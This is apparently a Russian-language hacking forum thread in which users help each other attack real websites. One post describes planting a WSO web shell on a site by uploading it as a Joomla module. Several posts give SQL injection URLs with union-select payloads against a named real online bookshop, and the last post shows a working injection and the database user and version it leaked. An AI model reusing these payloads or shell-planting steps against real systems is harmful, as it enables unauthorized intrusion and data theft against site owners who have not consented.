LokbatanLi То, что надо - работает. Кто-нибудь может "на пальцах" объяснить суть бага? В блоге Qwazar'a читал, но там тема несильно раскрыта. И, кстати, почему group_concat не воркает в таком запросе?
править то можно, только он ошибку выдает "Неверная контрольная суммафайла......." и в чом фишка немогу понять...
GOGA075 скачиваешь joomla xplorer и в админке устанавливаешь данный модуль , если не понял пиши в аську 8383один72
Нафиг не надо, просто грузишь новый модуль в наглую wso.php, оно напишет "бла-бла-бла, идите нафинг", но шелл таки под оригинальным названием останется в /media/wso.php или /tmp/wso.php
ссори за тупость... Есть скуля http://kniga-market.kiev.ua/about.php?id=121&crm=1&tmp=-41+union+select+concat_ws(0x3a%20,user(),database(%20%20),version())-- что делать дальше?( новичек в этом деле....
2ExQ http://kniga-market.kiev.ua/about.php?id=121&crm=1&tmp=-41+union+select+1+from+название таблички --
Ув. форумчане, вопрос следующий: на сайте есть скуль, имеется 1 БД (кроме стандартной). Данных о логине\пароле в этой БД нет. Может ли такое быть, или я что-то неправильно делаю? Сам сайт
Что значит эта ошибка? Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in /var/www/kniga-market/kniga-market.kiev.ua/about.php on line 7
то что ты ковычку зафигачил в параметр =)) Возможно есть sql inj. ты покажи запрос который ты отправляешь. Если это выдаёт просто скрипт без параметров, то скорее всего он просто криво написан.
http://kniga-market.kiev.ua/about.php?id=121&crm=1&tmp=-41+union+select+1+from+тут название таблички --
А пройти по указанному линку никак, не? http://kniga-market.kiev.ua/about.php - просто бага http://kniga-market.kiev.ua/producers.php?category=10' - скуля Code: http://kniga-market.kiev.ua/producers.php?category=10+union+select+1,2,concat_ws(0x3a,user(),version(),database()),4+-- u_knigamarke@localhost:4.1.22-log:knigamarket
